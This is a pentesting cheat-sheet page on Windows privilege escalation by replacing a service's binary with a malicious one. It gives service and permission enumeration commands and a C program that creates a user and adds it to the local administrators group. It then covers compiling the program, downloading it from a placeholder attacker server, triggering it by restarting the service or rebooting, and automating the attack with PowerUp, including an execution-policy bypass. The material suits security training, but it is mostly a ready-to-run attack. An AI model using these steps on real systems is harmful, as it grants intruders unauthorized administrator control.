Service Binary Hijacking
This attack involves replacing the service binary with a malicious version and restart the service.
Enumerate Services
PowerShell cmdlet
Using Get-CimInstance with PowerShell to list running services and filter built in services:
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running' -and $_.PathName -notlike "C:\Windows\system32*"}When running Get-CimInstance and Get-Service via WinRM or a bind shell will result in a "Access denied" error when querying for services with a non-administrative user.
Using an interactive logon such as RDP solves this problem.
Registry
The following one-liner command was taken from evil-winrm source code and uses the registry to enumerate services.
Note: this is very useful when using low privileged user.
$servicios = Get-ItemProperty "registry::HKLM\System\CurrentControlSet\Services\*" | Where-Object {$_.imagepath -notmatch "system" -and $_.imagepath -ne $null } | Select-Object pschildname,imagepath ; foreach ($servicio in $servicios ) {Get-Service $servicio.PSChildName -ErrorAction SilentlyContinue | Out-Null ; if ($? -eq $true) {$privs = $true} else {$privs = $false} ; $Servicios_object = New-Object psobject -Property @{"Service" = $servicio.pschildname ; "Path" = $servicio.imagepath ; "Privileges" = $privs} ; $Servicios_object
}Enumerate Binary Permissions
Verifying the permission to modify the binary:
icacls "<binary_path>"The table below describes the permissions definitions icacls results:
F
Full access
M
Modify access
RX
Read and execute access
R
Read-only access
W
Write-only access
Creating The Malicious Binary
The C code you provided appears to add a new user <user> with the password password123! to the system and elevate it to administrator:
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user <user> password123! /add");
i = system ("net localgroup administrators <user> /add");
return 0;
}Compiling this C code to create an executable:
x86_64-w64-mingw32-gcc adduser.c -o adduser.exeMoving the legitimate service's binary, in order to be able to replace with the malicious one:
move <binary_path> <somepath>Transferring the executable from the attacker machine:
iwr -uri http://<attacker_http_server>/adduser.exe -Outfile <binary_path>Triggering the Execution
In order to trigger the malicious binary execution it's needed to either restart the service manually or If the service is set to start automatically, it possible to reboot the machine to force the service to start. Once the service restarts, the malicious binary will be executed.
Checking the Service Permissions:
sc sdshow <service_name>Manual restart
Trying to restart the service:
net stop <service_name>
net start <service_name>Stop-Service <Service_name>
Start-Service <Service_name>Automatic restart
If restarting the service is not allowed, trying the another method as described above:
Checking if the service set to restart automatically:
sc query <service_name>Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<service_name>'}Checking if the current user (foothold) has the
SeShutdownPrivilegepermission which allows to reboot the machine
whoami /privRebooting the machine
/r - Reboot instead of shutdown.
/t 0 - Trigger in 0 seconds.
shutdown /r /t 0Automated Process
It is possible to automate the process using well known tool called PowerUp from PowerSploit Collection:
Downloading PowerUp.ps1:
iwr -uri http://<attacker_http_server>/PowerUp.ps1 -Outfile PowerUp.ps1Bypassing Execution Policy:
powershell -ep bypassImporting PowerUp.ps1:
. .\PowerUp.ps1Finding Modifiable Services using Get-ModifiableServiceFile is a PowerUp function that looks for services on the machine whose executables are modifiable by the current user.
Get-ModifiableServiceFileExploiting:
Install-ServiceBinary -Name '<service_name>'References
Last updated